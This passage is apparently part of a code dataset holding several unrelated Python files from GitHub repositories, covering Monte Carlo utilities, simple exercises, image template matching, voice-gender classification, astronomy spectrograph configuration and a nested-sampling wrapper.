i\n )\n # result = pool.amap(fn_to_eval, random_vars)\n # result = pool.apply_async(\n # multiprocessing_func,\n # (i, global_fn_multi, global_var_multi))\n all_stats.append(result.get())\n\n else:\n pbar.set_description(\"Monte carlo loop\")\n for i in pbar:\n random_vars = random_var_gen(i)\n result = fn_to_eval(*random_vars)\n all_stats.append(result)\n\n if (i != 0) and (i % save_every == 0):\n parts = os.path.splitext(save_name)\n out_name = parts[0] + \"_\" + str(i) + parts[1]\n df = list_to_df(all_stats, headers)\n here = os.path.dirname(os.path.realpath(__file__))\n os.makedirs(os.path.join(here, \"..\", \"mc\"), exist_ok=True)\n print(\"Saving results at {} iterations to {}\".format(i, out_name))\n df.to_csv(os.path.join(here, \"..\", \"mc\", out_name), index=False)\n\n return all_stats\n\n\ndef list_to_df(in_list, headers=None):\n \"\"\"Convert a list to a dataframe with the given headers.\"\"\"\n if headers is None:\n headers = [\"V{}\".format(i) for i in range(len(in_list[0]))]\n results_df = pd.DataFrame.from_records(in_list, columns=headers)\n return results_df\n\n\ndef summarise_monte_carlo(\n df,\n txt_outfile=None,\n plot=True,\n to_plot=None,\n plt_outfile=None,\n do_print=False,\n):\n \"\"\"Summary stats of monte carlo with optional dist plot.\"\"\"\n result = df.describe().round(4)\n if (txt_outfile is None) and do_print:\n print(result)\n elif txt_outfile is not None:\n with open(txt_outfile, \"w\") as f:\n f.write(result)\n if plot:\n if to_plot is None:\n raise ValueError(\"Please provide a column to plot\")\n a = df[to_plot].to_numpy()\n is_unique = (a[0] == a).all()\n if not is_unique:\n sns.displot(\n df[to_plot],\n kde=True,\n rug=False,\n # kde_kws={\"color\": \"k\", \"lw\": 3, \"label\": \"KDE\"},\n # hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1, \"color\": \"g\"},\n )\n if plt_outfile is None:\n plt.show()\n else:\n plt.savefig(plt_outfile, dpi=400)\n plt.close()\n return result\n\n\ndef get_distribution(result_df, column_name, num_iters):\n \"\"\"Calculate the simulated distribution of column_name.\"\"\"\n distrib = {}\n to_add = 1 / num_iters\n for val in result_df[column_name]:\n if val in distrib:\n distrib[val] += to_add\n else:\n distrib[val] = to_add\n\n ordered_dist = OrderedDict()\n keys = sorted(distrib.keys())\n for key in keys:\n ordered_dist[key] = distrib[key]\n\n return ordered_dist\n\n\ndef dist_difference(actual_distribution, expected_distribution):\n \"\"\"Calculate the difference between two 
distributions.\"\"\"\n difference = {}\n for k, v in expected_distribution.items():\n difference[k] = actual_distribution[k] - v\n return difference\n","repo_name":"seankmartin/NeuralConnections","sub_path":"Code/neuroconnect/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14558875231","text":"user_question = input(\"Напиши что-нибудь: \").lower()\n\ndef get_answer(question):\n answers={\n \"привет\":\"И тебе привет!\",\n \"как дела\":\"Лучше всех\", # в юпитере нет ошибки с этим ключом, в cmd есть\n \"пока\":\"Увидимся\"\n }\n return answers[question]\n\nprint(get_answer(user_question))","repo_name":"TGrigoryeva/Learn-Python","sub_path":"lesson1/getanswer.py","file_name":"getanswer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"25559097608","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 20 17:30:25 2023\r\n\r\n@author: hp\r\n\"\"\"\r\na =[\"Kabir\",\"Meera\",\"Tulsidaas\",\"buddha\",\"Krishnamurti\"]\r\n\r\nfor name in a:\r\n if name.startswith(\"K\"):\r\n print(\"Namaste,\"+ name)","repo_name":"amitkumar824/python","sub_path":"nf6.py","file_name":"nf6.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"20092576366","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 11 08:29:52 2018\n\n@author: arden\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n#use GUI for near perfect match detection\n\nimg_bgr = cv2.imread('../images/eyes/sample_1.jpg')\nimg_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n\ntemplate = cv2.imread('../images/eyes/template_1.jpg',0)\nw, h = template.shape[::-1]\n\nres = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)\nthreshold = 0.8\nloc = np.where(res > threshold)\n\nfor pt in zip(*loc[::-1]):\n cv2.rectangle(img_bgr, pt, (pt[0]+w, pt[1]+h), (0,255,255), 2)\n \ncv2.imshow('detected', img_bgr)\n","repo_name":"18381304961/concussionanalysis","sub_path":"tutorials/gradient/template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"39361374629","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numbers\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import roc_curve, auc\n\ndata = pd.read_csv('voice.csv')\n\n# Converts 'male' -> 1 and 'female' -> -1\ndata = data.replace(['male','female'],[1,-1])\nX = data.values[:,0:-1]\nY = data.values[:,-1]\n\n# Checks that all values in the data matrix are numbers\nfor i in range(X.shape[0]):\n for j in range(X.shape[1]):\n if(not isinstance(X[i,j], numbers.Number)):\n print(\"NAN @ %d %d\" % (i,j))\n\n# Splits the data into a training set and testing set\n# If not specified, testing is 25% of all the data\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, 
random_state=0)\n\n# Scale all training features to have a mean of zero and std dev of 1\n# Will only use the training data to determine how to scale the features\n# Testing data will have a mean of approx 0 and a std dev of approx 1\nscaler = StandardScaler().fit(X_train)\nnorm_X_train = scaler.transform(X_train)\nnorm_X_test = scaler.transform(X_test)\n\n# Ten-fold Cross Validation on the MLP Classifier (checking accuracy of model)\n# Only do cross validation on the training set, NOT THE TEST SET\nmlp = MLPClassifier(max_iter=500, random_state=0)\nprint(\"Starting MLP 10-fold cross validation...\")\nmlp_score = cross_val_score(mlp, norm_X_train, Y_train, cv=10, verbose=3, n_jobs=1)\nmlp_score = np.average(mlp_score)\nprint()\n\n# Create MLP Classifier object, with random_state = 0\nmlp = MLPClassifier(max_iter = 500, random_state=0)\nmlp.fit(norm_X_train,Y_train)\nmlp_Y_pred = mlp.predict(norm_X_test)\n# precision_recall_fscore_support expects (y_true, y_pred) in that order\nmlp_metrics = precision_recall_fscore_support(Y_test, mlp_Y_pred)\nmlp_precision = np.average(mlp_metrics[0]) # First array is precision of each class\nmlp_recall = np.average(mlp_metrics[1]) # Second array is recall of each class\nmlp_f1 = 2 * (mlp_precision * mlp_recall) / (mlp_precision + mlp_recall)\n\n# Creates a ROC Curve for the MLP trained above\nclassifier = OneVsRestClassifier(MLPClassifier(max_iter = 500, random_state=0))\ny_score = classifier.fit(norm_X_train, Y_train).predict(norm_X_test)\nfpr, tpr, _ = roc_curve(Y_test, y_score)\nroc_auc_MLP = auc(fpr, tpr)\nplt.figure()\nlw = 2\nplt.plot(fpr, tpr, color='red', lw=lw)\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC Curves for Different Models')\nplt.legend(loc=\"lower right\")\n\n# Ten-fold Cross Validation on the SVM Classifier (checking accuracy of model)\n# Only do cross validation on the training set, NOT THE TEST SET\nsvm = SVC(C = 2, kernel = 'rbf')\nprint(\"Starting SVM 10-fold cross validation...\")\nsvm_score = cross_val_score(svm, norm_X_train, Y_train, cv=10, verbose=3, n_jobs=1)\nsvm_score = np.average(svm_score)\nprint()\n\n# Create a SVM classifier with optimal parameters specified below\nsvm = SVC(C = 2, kernel = 'rbf')\nsvm.fit(norm_X_train,Y_train)\nsvm_Y_pred = svm.predict(norm_X_test)\nsvm_metrics = precision_recall_fscore_support(Y_test, svm_Y_pred)\nsvm_precision = np.average(svm_metrics[0]) # First array is precision of each class\nsvm_recall = np.average(svm_metrics[1]) # Second array is recall of each class\nsvm_f1 = 2 * (svm_precision * svm_recall) / (svm_precision + svm_recall)\n\n# Creates a ROC Curve for the SVM trained above\nclassifier = OneVsRestClassifier(SVC(C = 2, kernel = 'rbf'))\ny_score = classifier.fit(norm_X_train, Y_train).decision_function(norm_X_test)\nfpr, tpr, _ = roc_curve(Y_test, y_score)\nroc_auc_SVM = auc(fpr, tpr)\nplt.plot(fpr, tpr, color='navy', lw=lw)\nplt.plot([0, 1], [0, 1], color='black', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.legend(['ROC Curve for MLP (area = %0.3f)' % roc_auc_MLP,\n            'ROC Curve for SVM (area = %0.3f)' % roc_auc_SVM,\n            'Standard Curve'],loc=\"lower right\")\n\n# Output the metrics of the models\nprint(\"Neural Network Model Test Set Metrics:\")\nprint(\"\\tCross Val Acc:\\t%f\" % mlp_score)\nprint(\"\\tAccuracy:\\t%f\" % mlp.score(norm_X_test, Y_test))\nprint(\"\\tPrecision:\\t%f\" % mlp_precision)\nprint(\"\\tRecall:\\t\\t%f\" % mlp_recall)\nprint(\"\\tF1:\\t\\t%f\" % mlp_f1)\nprint(\"\")\nprint(\"Support Vector Machine Model Test Set 
Metrics:\")\nprint(\"\\tCross Val Acc:\\t%f\" % svm_score)\nprint(\"\\tAccuracy:\\t%f\" % svm.score(norm_X_test, Y_test))\nprint(\"\\tPrecision:\\t%f\" % svm_precision)\nprint(\"\\tRecall:\\t\\t%f\" % svm_recall)\nprint(\"\\tF1:\\t\\t%f\" % svm_f1)\n\n# Shows the ROC Curve plots that were made earlier\nplt.show()\n\n################################################################################\n# Used to find the optimal parameters for the Neural Network model\n# max_iter = 80 and random_state = 0\n################################################################################\n# mlp = MLPClassifier(random_state=0)\n# alphas = 10.0 ** -np.arange(1,7)\n# iterations = np.arange(20,2000,20)\n# params = {'alpha':alphas, 'max_iter':iterations}\n# clf = GridSearchCV(mlp, params)\n# clf.fit(norm_X_train,Y_train)\n# print(clf.best_params_)\n\n################################################################################\n# Used to visualize how accuracy changed with max_iter for Neural Network model\n################################################################################\n# train_scores = []\n# test_scores = []\n# for i in np.arange(70,90,1):\n# print(\"Training %d max_iter\" % (i))\n# mlp = MLPClassifier(max_iter=i, random_state=0)\n# mlp.fit(norm_X_train,Y_train)\n# train_scores.append(mlp.score(norm_X_train, Y_train))\n# test_scores.append(mlp.score(norm_X_test, Y_test))\n#\n# plt.plot(np.arange(70,90,1), train_scores)\n# plt.plot(np.arange(70,90,1), test_scores)\n# plt.legend(['train acc','test acc'])\n# plt.show()\n\n################################################################################\n# Used to find the optimal parameters for the SVM model\n# C = 2 and kernel = 'rbf'\n################################################################################\n# C = np.array([0.25,0.5,0.75,1,1.25,1.5,1.75,2,2.25,2.5])\n# kernels = ['linear','poly','rbf','sigmoid']\n# for c in C:\n# for k in kernels:\n# svm = SVC(C = c, kernel = k)\n# svm.fit(norm_X_train,Y_train)\n# print(\"C: %f, kernel: %s, accuracy: %.8f\" % (c, k, svm.score(norm_X_test,Y_test)))\n","repo_name":"cmoroz1/ML-gender-recog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28510783418","text":"# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\nimport matplotlib as mp\nimport pandas as pd\nimport sqlite3 as sq\nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport pylab\nimport argparse\n\n# \n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--plot_output',default='',help='specify the plot output location')\nargparser.add_argument('--db_folder_path',default='',help='specify the folder location of db')\nargparser.add_argument('--db_file_name',default='',help='specify name of db')\n\n# \n\n# args = argparser.parse_args()\n# folderpath = args.db_folder_path\n# #raw_input(\"Enter folder name: \")\n# database_filename = args.db_file_name\n# #raw_input(\"Enter database file name (with .db): \")\n\nfolderpath='../cse-B85-HD3'\ndatabase_filename='cse-B85-HD3.db'\n\n\nif len(folderpath)>0:\n\tdatabasepath = str(folderpath) + '/'+str(database_filename)\nelse:\n\tdatabasepath= str(database_filename)\n\n# \n\nconnection = sq.connect(databasepath)\n\n# \n\nproject_cursor = connection.cursor()\nproject_cursor.execute('SELECT id,name FROM program')\nproject_table = pd.DataFrame(columns=['program_id','program_name'],index=None)\nfor project in project_cursor:\n 
project_table.loc[len(project_table)]=[project[0],project[1]] \n \nfirstrow=project_table.head()\n\n# \n\nN=firstrow.program_name.count()\nfor i in range(N):\n row_project_name = str(firstrow.program_name[i])\n row_project_id = str(firstrow.program_id[i])\n configuration_cursor = connection.cursor()\n program_id_val = (row_project_id,)\n configuration_cursor.execute('SELECT id,time,result_id FROM (SELECT id FROM configuration where program_id = ?) INNER JOIN (SELECT id as result_id,configuration_id, [time] FROM result WHERE time is not 10000.0) ON id = configuration_id',program_id_val)\n df= pd.DataFrame(columns=['config_id','time','result_id'])\n index_no=[]\n counter = 0\n for row in configuration_cursor:\n counter = counter+1\n index_no.append(counter)\n df.loc[len(df)]=[row[0],row[1],row[2]]\n \n \n df.time=100/df.time\n df_result_id = df.sort('result_id')\n df_time = df.sort('time')\n \n plt.clf()\n plt.scatter(index_no, df_result_id.time)\n plt.ylabel('run time in ops_per_min')\n plt.xlabel('result index')\n plt.grid(True)\n plt.savefig('plots/sorted_result_id_'+row_project_name+'.pdf')\n \n plt.clf()\n plt.scatter(index_no,df_time.time)\n plt.ylabel('run time in ops_per_min')\n plt.xlabel('result index')\n plt.grid(True)\n plt.savefig('plots/sorted_opes_per_min'+row_project_name+'.pdf')\n\n# \n\n\n","repo_name":"sarubi/JATTHotspotTuner","sub_path":"Common/opentuner_results_plot.py","file_name":"opentuner_results_plot.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"17864976694","text":"\"\"\" Module for Magellan/MAGE specific codes\n\"\"\"\nimport numpy as np\n\nfrom astropy.time import Time\nfrom astropy.io import fits\n\nfrom pypeit import msgs\nfrom pypeit import telescopes\nfrom pypeit.core import framematch\nfrom pypeit.core import parse\nfrom pypeit.par import pypeitpar\nfrom pypeit.spectrographs import spectrograph\nfrom pypeit.images import detector_container\nfrom pypeit import debugger\n\nfrom IPython import embed\n\nclass MagellanMAGESpectrograph(spectrograph.Spectrograph):\n \"\"\"\n Child to handle Magellan/MAGE specific code\n \"\"\"\n def __init__(self):\n # Get it started\n super(MagellanMAGESpectrograph, self).__init__()\n self.spectrograph = 'magellan_mage'\n self.camera = 'MagE'\n self.telescope = telescopes.MagellanTelescopePar()\n ndet = 1\n\n def get_detector_par(self, hdu, det):\n \"\"\"\n Return a DectectorContainer for the current image\n\n Args:\n hdu (`astropy.io.fits.HDUList`):\n HDUList of the image of interest.\n Ought to be the raw file, or else..\n det (int):\n\n Returns:\n :class:`pypeit.images.detector_container.DetectorContainer`:\n\n \"\"\"\n # Binning\n binning = self.get_meta_value(self.get_headarr(hdu), 'binning') # Could this be detector dependent??\n\n # Detector 1\n detector_dict = dict(\n binning = binning,\n det = 1,\n dataext = 0,\n specaxis = 1,\n specflip = True,\n spatflip = False,\n # plate scale in arcsec/pixel\n platescale = 0.3,\n # electrons/pixel/hour. 
From: http://www.lco.cl/telescopes-information/magellan/instruments/mage/the-mage-spectrograph-user-manual\n darkcurr = 1.00,\n saturation = 65535.,\n # CCD is linear to better than 0.5 per cent up to digital saturation (65,536 DN including bias) in the Fast readout mode.\n nonlinear = 0.99,\n mincounts = -1e10,\n numamplifiers = 1,\n gain = np.atleast_1d(1.02), # depends on the readout\n ronoise = np.atleast_1d(2.9), # depends on the readout\n datasec = np.atleast_1d('[1:1024, 1:2048]'),\n oscansec = np.atleast_1d('[1:1024, 2049:2176]'),\n )\n # Taken from the MASE paper: https://arxiv.org/pdf/0910.1834.pdf\n #self.norders = 15\n # 20-6\n return detector_container.DetectorContainer(**detector_dict)\n\n @property\n def pypeline(self):\n return 'Echelle'\n\n def default_pypeit_par(self):\n \"\"\"\n Set default parameters for magellan MagE reduction.\n \"\"\"\n par = pypeitpar.PypeItPar()\n par['rdx']['spectrograph'] = 'magellan_mage'\n # Bias\n #par['calibrations']['biasframe']['useframe'] = 'overscan'\n # Wavelengths\n # 1D wavelength solution\n par['calibrations']['wavelengths']['rms_threshold'] = 0.20 # Might be grating dependent..\n par['calibrations']['wavelengths']['sigdetect'] = 5.0\n par['calibrations']['wavelengths']['lamps'] = ['ThAr_MagE']\n #par['calibrations']['wavelengths']['nonlinear_counts'] = self.detector[0]['nonlinear'] * self.detector[0]['saturation']\n\n par['calibrations']['wavelengths']['method'] = 'reidentify'\n par['calibrations']['wavelengths']['cc_thresh'] = 0.50\n par['calibrations']['wavelengths']['cc_local_thresh'] = 0.50\n\n # Reidentification parameters\n par['calibrations']['wavelengths']['reid_arxiv'] = 'magellan_mage.fits'\n par['calibrations']['wavelengths']['ech_fix_format'] = True\n # Echelle parameters\n par['calibrations']['wavelengths']['echelle'] = True\n par['calibrations']['wavelengths']['ech_nspec_coeff'] = 4\n par['calibrations']['wavelengths']['ech_norder_coeff'] = 4\n par['calibrations']['wavelengths']['ech_sigrej'] = 3.0\n\n par['scienceframe']['process']['sigclip'] = 20.0\n par['scienceframe']['process']['satpix'] = 'nothing'\n\n # Set slits and tilts parameters\n par['calibrations']['tilts']['tracethresh'] = [10]*self.norders\n par['calibrations']['slitedges']['fit_order'] = 5\n par['calibrations']['slitedges']['max_shift_adj'] = 3.\n par['calibrations']['slitedges']['edge_thresh'] = 10. 
# Tough to get the bluest orders\n par['calibrations']['slitedges']['left_right_pca'] = True\n par['calibrations']['slitedges']['fit_min_spec_length'] = 0.3 # Allow for a short detected blue order\n # Find object parameters\n par['reduce']['findobj']['find_trim_edge'] = [4,4] # Slit is too short to trim 5,5 especially with 2x binning\n # Always flux calibrate, starting with default parameters\n # Do not correct for flexure\n par['flexure']['spec_method'] = 'skip'\n # Set the default exposure time ranges for the frame typing\n par['calibrations']['standardframe']['exprng'] = [None, 20]\n par['calibrations']['arcframe']['exprng'] = [20, None]\n par['calibrations']['darkframe']['exprng'] = [20, None]\n par['scienceframe']['exprng'] = [20, None]\n return par\n\n def init_meta(self):\n \"\"\"\n Generate the meta data dict\n Note that the children can add to this\n\n Returns:\n self.meta: dict (generated in place)\n\n \"\"\"\n meta = {}\n # Required (core)\n meta['ra'] = dict(ext=0, card='RA')\n meta['dec'] = dict(ext=0, card='DEC')\n meta['target'] = dict(ext=0, card='OBJECT')\n #TODO: Check decker is correct\n meta['decker'] = dict(ext=0, card='SLITNAME')\n meta['binning'] = dict(card=None, compound=True)\n# self.meta['binning'] = dict(ext=0, card='BINNING')\n meta['mjd'] = dict(ext=0, card=None, compound=True)\n meta['exptime'] = dict(ext=0, card='EXPTIME')\n meta['airmass'] = dict(ext=0, card='AIRMASS')\n # Extras for config and frametyping\n meta['dispname'] = dict(ext=0, card='INSTRUME')\n meta['idname'] = dict(ext=0, card='EXPTYPE')\n\n # Ingest\n self.meta = meta\n\n def compound_meta(self, headarr, meta_key):\n \"\"\"\n\n Args:\n headarr: list\n meta_key: str\n\n Returns:\n value\n\n \"\"\"\n if meta_key == 'binning':\n binspatial, binspec = parse.parse_binning(headarr[0]['BINNING'])\n return parse.binning2string(binspec, binspatial)\n elif meta_key == 'mjd':\n time = '{:s}T{:s}'.format(headarr[0]['UT-DATE'], headarr[0]['UT-TIME'])\n ttime = Time(time, format='isot')\n return ttime.mjd\n else:\n msgs.error(\"Not ready for this compound meta\")\n\n def configuration_keys(self):\n return []\n\n def check_frame_type(self, ftype, fitstbl, exprng=None):\n \"\"\"\n Check for frames of the provided type.\n \"\"\"\n if ftype in ['pinhole', 'dark']:\n # No pinhole or bias or dark frames\n return np.zeros(len(fitstbl), dtype=bool)\n elif ftype in ['bias']:\n return fitstbl['idname'] == 'Bias'\n elif ftype in ['pixelflat', 'trace']:\n return fitstbl['idname'] == 'Flat'\n elif ftype in ['arc']:\n return fitstbl['idname'] == 'ThAr-Lamp'\n else:\n return (fitstbl['idname'] == 'Object') \\\n & framematch.check_frame_exptime(fitstbl['exptime'], exprng)\n\n def bpm(self, filename, det, shape=None, msbias=None):\n \"\"\"\n Override parent bpm function with BPM specific to X-Shooter VIS.\n\n .. todo::\n Allow for binning changes.\n\n Parameters\n ----------\n det : int, REQUIRED\n msbias : numpy.ndarray, required if the user wishes to generate a BPM based on a master bias\n **null_kwargs:\n Captured and never used\n\n Returns\n -------\n bpix : ndarray\n 0 = ok; 1 = Mask\n\n \"\"\"\n msgs.info(\"Custom bad pixel mask for MAGE\")\n bpm_img = self.empty_bpm(filename, det, shape=shape)\n\n # Fill in bad pixels if a master bias frame is provided\n if msbias is not None:\n return self.bpm_frombias(msbias, det, bpm_img)\n\n # Get the binning\n hdu = fits.open(filename)\n binspatial, binspec = parse.parse_binning(hdu[0].header['BINNING'])\n hdu.close()\n # Do it\n bpm_img[:, :10//binspatial] = 1. 
# Setting BPM on the edge of the detector often leads to false edges\n bpm_img[:, 1020//binspatial:] = 1.\n # Return\n return bpm_img\n\n# TODO: Not sure if this was ever used.\n# @staticmethod\n# def slitmask(tslits_dict, pad=None, binning=None):\n# \"\"\"\n# Generic routine ton construct a slitmask image from a tslits_dict. Children of this class can\n# overload this function to implement instrument specific slitmask behavior, for example setting\n# where the orders on an echelle spectrograph end\n#\n# Parameters\n# -----------\n# tslits_dict: dict\n# Trace slits dictionary with slit boundary information\n#\n# Optional Parameters\n# pad: int or float\n# Padding of the slit boundaries\n# binning: tuple\n# Spectrograph binning in spectral and spatial directions\n#\n# Returns\n# -------\n# slitmask: ndarray int\n# Image with -1 where there are no slits/orders, and an integer where there are slits/order with the integer\n# indicating the slit number going from 0 to nslit-1 from left to right.\n#\n# \"\"\"\n#\n# # These lines are always the same\n# pad = tslits_dict['pad'] if pad is None else pad\n# slitmask = pixels.slit_pixels(tslits_dict['lcen'], tslits_dict['rcen'], tslits_dict['nspat'], pad=pad)\n#\n# return slitmask\n\n @property\n def norders(self):\n return 15 # 20-6\n\n @property\n def order_spat_pos(self):\n ord_spat_pos = np.array([0.3157, 0.3986, 0.47465896, 0.5446689, 0.60911287, 0.66850584, 0.72341316,\n 0.77448156, 0.82253604, 0.86875753, 0.91512689, 0.96524312])\n return ord_spat_pos\n\n @property\n def orders(self):\n return np.arange(17, 5, -1, dtype=int)\n\n\n @property\n def spec_min_max(self):\n spec_max = np.full(self.norders, np.inf)\n spec_min = np.full(self.norders, -np.inf)\n return np.vstack((spec_min, spec_max))\n\n def order_platescale(self, order_vec, binning=None):\n \"\"\"\n Returns the plate scale in arcseconds for each order\n\n Args:\n order_vec (np.ndarray): Order numbers\n binning (optional):\n\n Returns:\n np.ndarray: Platescale\n\n \"\"\"\n norders = len(order_vec)\n binspatial, binspec = parse.parse_binning(binning)\n return np.full(norders, 0.30*binspatial)\n\n\n","repo_name":"PepeJoseHU/PypeIt","sub_path":"pypeit/spectrographs/magellan_mage.py","file_name":"magellan_mage.py","file_ext":"py","file_size_in_byte":11086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"} +{"seq_id":"9503160113","text":"import turtle\nimport math\nimport random\nt = turtle.Turtle()\nhulknurgad = 0\n\ndef hulknurk(arv, pikkus):\n sisenurk = (arv - 2) * 180 / arv\n for i in range(arv):\n t.forward(pikkus)\n t.right(180 - sisenurk)\n i += 1\n \nwhile hulknurgad <= 30:\n t.up()\n t.setx(random.randint(-200, 200))\n t.sety(random.randint(-200, 200))\n t.down()\n hulknurk(random.randint(3, 20), random.randint(20, 50))\n hulknurgad += 1\n \nturtle.exitonclick()\nturtle.done()","repo_name":"ArR4e/DSProject","sub_path":"processed/K04/S145/kodu3.py","file_name":"kodu3.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"21302939258","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n#x: xscreen: starting position on screen(m)\r\n#y: yscreen: starting postition on screen(m)\r\n\r\ndef square_intensity(a, l, D):\r\n x = np.linspace(-10, 10, 10000) ##??\r\n y = np.linspace(-10, 10, 10000) ##??\r\n y = list()\r\n for val in x:\r\n stuff_x = ((2*np.pi*a*val) / (l*D))\r\n stuff_y = ((2*np.pi*a*val) / (l*D))\r\n j = 
((math.sin(stuff_x)) / (stuff_x))**2\r\n        k = ((math.sin(stuff_y)) / (stuff_y))**2\r\n        i = j * k\r\n        y.append(i)\r\n    \r\n    plt.subplot(121)\r\n    plt.title(\"Square: Theoretical\")\r\n    #plt.plot(x,y)\r\n    return [x, y]\r\n\r\n\r\n\r\n#test\r\n\r\ndef input_():\r\n    #user inputs\r\n    l = input(\"enter a wavelength (nm): \")\r\n    l = float(l) * (10**-9)\r\n    a = input(\"enter a slit width (micro m): \") #for single slit\r\n    a = float(a) * (10**-6)\r\n    #d = input(\"enter a slit separation (micro m): \") #for double slit\r\n    #d = float(d) * (10**-10)\r\n    D = input(\"enter a distance from the screen (m): \")\r\n    D = float(D)\r\n    #N = input(\"enter number of slits: \") #for n slit\r\n    #N = int(N)\r\n    #num = input(\"finally, input the number of particles: \")\r\n    #num = int(num)\r\n\r\n    square_intensity(a, l, D)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    #run\r\n    input_()\r\n","repo_name":"ehcrook/slit_experiment","sub_path":"square_intensity.py","file_name":"square_intensity.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"15302608960","text":"import logging\nimport os\nimport numpy as np\nfrom barry.samplers.sampler import Sampler\n\n\nclass NautilusSampler(Sampler):\n    def __init__(self, temp_dir=None, max_iter=None, dynamic=False, nlive=500, nupdate=None, print_progress=False):\n\n        self.logger = logging.getLogger(\"barry\")\n        self.max_iter = max_iter\n        self.nlive = nlive\n        self.nupdate = nupdate\n        self.temp_dir = temp_dir\n        if temp_dir is not None and not os.path.exists(temp_dir):\n            os.makedirs(temp_dir, exist_ok=True)\n        self.dynamic = dynamic\n        self.print_progress = print_progress\n\n    def get_filename(self, uid):\n        return os.path.join(self.temp_dir, f\"{uid}_nautilus_chain.npy\")\n\n    def fit(self, model, save_dims=None, uid=None):\n        \"\"\"Runs the sampler over the model and returns the flat chain of results\n\n        Parameters\n        ----------\n        model : class\n            An instance of one of Barry's model classes\n        save_dims : int, optional\n            Only return values for the first ``save_dims`` parameters.\n            Useful to remove numerous marginalisation parameters if running\n            low on memory or hard drive space.\n        uid : str, optional\n            A unique identifier used to differentiate different fits\n            if two fits both serialise their chains and use the\n            same temporary directory\n        Returns\n        -------\n        dict\n            A dictionary of results containing:\n                - *chain*: the chain\n                - *weights*: chain weights if applicable\n                - *posterior*: posterior values for each point in the chain\n                - *evidence*: Bayesian evidence for the model/data combo.\n\n        \"\"\"\n        import nautilus\n\n        log_likelihood = model.get_posterior\n        num_dim = model.get_num_dim()\n        prior_transform = model.unscale\n\n        assert log_likelihood is not None\n        assert prior_transform is not None\n\n        filename = self.get_filename(uid)\n        if os.path.exists(filename):\n            self.logger.info(\"Not sampling, returning result from file.\")\n            return self.load_file(filename)\n        self.logger.info(\"Sampling posterior now\")\n\n        if save_dims is None:\n            save_dims = num_dim\n        self.logger.debug(\"Fitting framework with %d dimensions\" % num_dim)\n        self.logger.info(\"Using nautilus Sampler\")\n        sampler = nautilus.Sampler(prior_transform, log_likelihood, n_dim=num_dim, n_live=self.nlive, n_update=self.nupdate)\n        sampler.run(verbose=self.print_progress)\n\n        self.logger.debug(\"Fit finished\")\n\n        chain, logw, likelihood = sampler.posterior()\n        logz = sampler.evidence()\n        weights = np.exp(logw)\n        max_weight = 
weights.max()\n trim = max_weight / 1e5\n mask = weights > trim\n self._save(chain[mask, :], weights[mask], likelihood[mask], filename, np.zeros(len(mask))[mask] + logz, save_dims)\n return {\n \"chain\": chain[mask, :],\n \"weights\": weights[mask],\n \"posterior\": likelihood[mask],\n \"evidence\": np.zeros(len(mask))[mask] + logz,\n }\n\n def _save(self, chain, weights, likelihood, filename, logz, save_dims):\n res = np.vstack((likelihood, weights, logz, chain[:, :save_dims].T)).T\n np.save(filename, res.astype(np.float32))\n\n def load_file(self, filename):\n results = np.load(filename)\n likelihood = results[:, 0]\n weights = results[:, 1]\n logz = results[:, 2]\n flat_chain = results[:, 3:]\n return {\"chain\": flat_chain, \"posterior\": likelihood, \"evidence\": logz, \"weights\": weights}\n","repo_name":"Samreay/Barry","sub_path":"barry/samplers/nautilus_sampler.py","file_name":"nautilus_sampler.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"30"} +{"seq_id":"5514454555","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndef best_record_company():\n # top40UK\n top40UK = pd.read_csv(\"src/UK-top40-1964-1-2.tsv\", sep='\\t')\n print(top40UK.shape)\n\n # here we going to group by WoC and sum\n publisher_stats = top40UK.groupby('Publisher')['WoC'].sum()\n \n \n # find the best publisher by 